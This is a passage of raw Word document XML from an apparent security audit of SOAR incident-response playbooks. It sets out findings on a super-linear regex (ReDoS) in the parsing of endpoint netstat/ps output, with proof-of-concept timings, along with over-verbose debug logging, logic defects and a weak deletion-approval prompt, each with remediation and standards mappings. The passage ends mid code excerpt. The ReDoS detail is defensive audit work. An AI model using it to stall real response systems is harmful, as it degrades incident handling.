      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-11 Error Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-15 — Super-linear regex on endpoint-controlled RTR stdout and invalid escape sequences</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 2.6). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/CrowdStrike_OAuth_API_Endpoint_Analysis.py:280,312,453; Jira_Related_Tickets_Search.py:160,229</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The endpoint-analysis playbook parses RTR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stdout line-by-line with regexes that mix greedy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.*?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\s+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\w+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on input a local attacker on the endpoint controls (process names, paths - which can contain many spaces). The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^(\w+)\s+(.*?)\s+(.*?)\s+(\w+)\s+(\d+)\s(.*?)\s(\d.*?)\s+$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the orphan pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^\s+(.*?)\s+$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exhibit measurable super-linear growth on space-heavy lines. The patterns are also written as plain (non-raw) strings, so Python emits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SyntaxWarning: invalid escape sequence '\w'/'\s'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> today and these become </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on a future Python - the file fails </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ast.parse -W error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> now. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: a user/malware on the collected endpoint can emit process/socket rows with long runs of spaces; the SOAR worker parses them. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable for worker CPU/time (ReDoS-style)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, bounded by stdout size the connector returns. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_regex2.py</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_regex3.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (real output) show quadratic growth - netstat regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>n=100 -&gt; 0.000s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>200 -&gt; 0.002s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>400 -&gt; 0.008s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>800 -&gt; 0.029s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; orphan regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>50 -&gt; 0.000s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>100 -&gt; 0.002s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>200 -&gt; 0.013s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>400 -&gt; 0.087s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The background run at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>n=8000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> did not finish within the 120 s limit (exit 124), confirming the trend. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> start-time pattern never matches crafted input and returns fast (no backtracking there). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ast.parse(..., -W error::SyntaxWarning)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reports </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SyntaxError: invalid escape sequence '\w'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for this file. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: make the patterns raw strings, anchor and bound the quantifiers (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[^\s]+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, explicit field widths), or split on whitespace with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>str.split(maxsplit=...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead of a single greedy regex; cap the number of stdout lines parsed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1333 Inefficient Regular Expression Complexity (ReDoS); CWE-400 Uncontrolled Resource Consumption (2024 CWE Top 25 #24); CWE-20 Improper Input Validation (2024 CWE Top 25 #12). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1499 Endpoint Denial of Service. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, SC-5 Denial-of-Service Protection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-16 — phantom.debug logs full observable and result structures (investigation data to logs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (CVSS v3.1 base 1.8). Exploitability: Data minimisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/Active_Directory_Enable_Account_Dispatch.py:107,116; CrowdStrike_OAuth_API_Executable_Denylisting.py:102; playbooks/CrowdStrike_OAuth_API_Network_Isolation.py:126; playbooks/CrowdStrike_OAuth_API_File_Eviction.py:109; playbooks/CrowdStrike_OAuth_API_File_Restore.py:99; playbooks/CrowdStrike_OAuth_API_Endpoint_Analysis.py:447; playbooks/CrowdStrike_OAuth_API_Dynamic_Analysis.py:304,395</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t>: Numerous blocks log full observable/result structures to the SOAR debug log at INFO. These contain usernames, device ids, internal IPs, file hashes and connection tables. None are credentials, but they are investigation data that need not be in debug output and that widens who can see it (anyone with log access). The inconsistency (Disable dispatch commented the debug out, Enable left it active) shows this is incidental, not intended.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict</w:t>
      </w:r>
      <w:r>
        <w:t>: Not an external-exploit vector; defense-in-depth / data-minimisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: remove or gate these </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.debug</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> calls behind a debug flag; never log full result objects in production content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-532 Insertion of Sensitive Information into Log File; CWE-200 Exposure of Sensitive Information to an Unauthorized Actor (2024 CWE Top 25 #17). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AU-9 Protection of Audit Information, SI-11 Error Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security, DE.AE Detect - Adverse Event Analysis. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.15 Logging. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-17 — Correctness and dead-code defects (misrouted enrichment dispatch, wrong keys, column mismatch)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Correctness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/Automated_Enrichment.py:34-35; Azure_AD_Graph_User_Attribute_Lookup.py:180; AD_LDAP_Entity_Attribute_Lookup.py:152; PhishTank_URL_Reputation_Analysis.py:253-254; MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.py:137; Dynamic_Analysis_Dispatch.py:124,129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Logic/quality defects that cause wrong routing, always-null outputs, downstream crashes or malformed reports. None is directly a security sink but several degrade detection/response (the Automated Enrichment misrouting means reputation analysis silently does not run; the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"soure"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> typo crashes the attribute dispatcher on AD LDAP users). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: fix the playbook name in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Automated_Enrichment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"soure"</w:t>
      </w:r>
      <w:r>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"source"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key, the PhishTank </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key, the O365 report header, and remove the duplicate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.format</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-670; CWE-561 Dead Code. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-18 — Analyst-prompt design weaknesses in the Search-and-Purge playbooks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Design weakness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/G_Suite_for_Gmail_Search_and_Purge.py:277-305,330-355; MS_Graph_for_Office_365_Search_and_Purge.py:354-435</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These playbooks correctly gate permanent/soft deletion on a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prompt2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the container owner (good - this is the pattern the other destructive playbooks lack, PB1-03). Two weaknesses: (1) the prompt is addressed to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container.get('owner_name')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>role=None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so if the container is unowned or owned by a low-privilege user the approval may go to the wrong person or auto-expire; (2) in the O365 variant the prompt table is built from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filtered-data:identifier_filter:condition_2:...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>format_prompt.py:360-365</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>condition_2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the "no observables" branch, so the analyst can be shown an empty/mismatched table while still being asked to approve a delete. The Gmail variant builds its prompt from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>condition_1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> correctly. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: address the prompt to a security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rather than the container owner, and build the prompt table from the same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>condition_1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dataset that feeds the eviction so the analyst sees exactly what will be deleted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-357; CWE-840. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-3 Access Enforcement, IR-4 Incident Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.15 Access control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-16 — Bare except and unguarded dictionary/division in result normalisation blocks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Robustness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/internal_host_winrm_log4j_investigate.py:83-84; VirusTotal_v3_Dynamic_Analysis.py:193; UrlScan_IO_Dynamic_Analysis.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
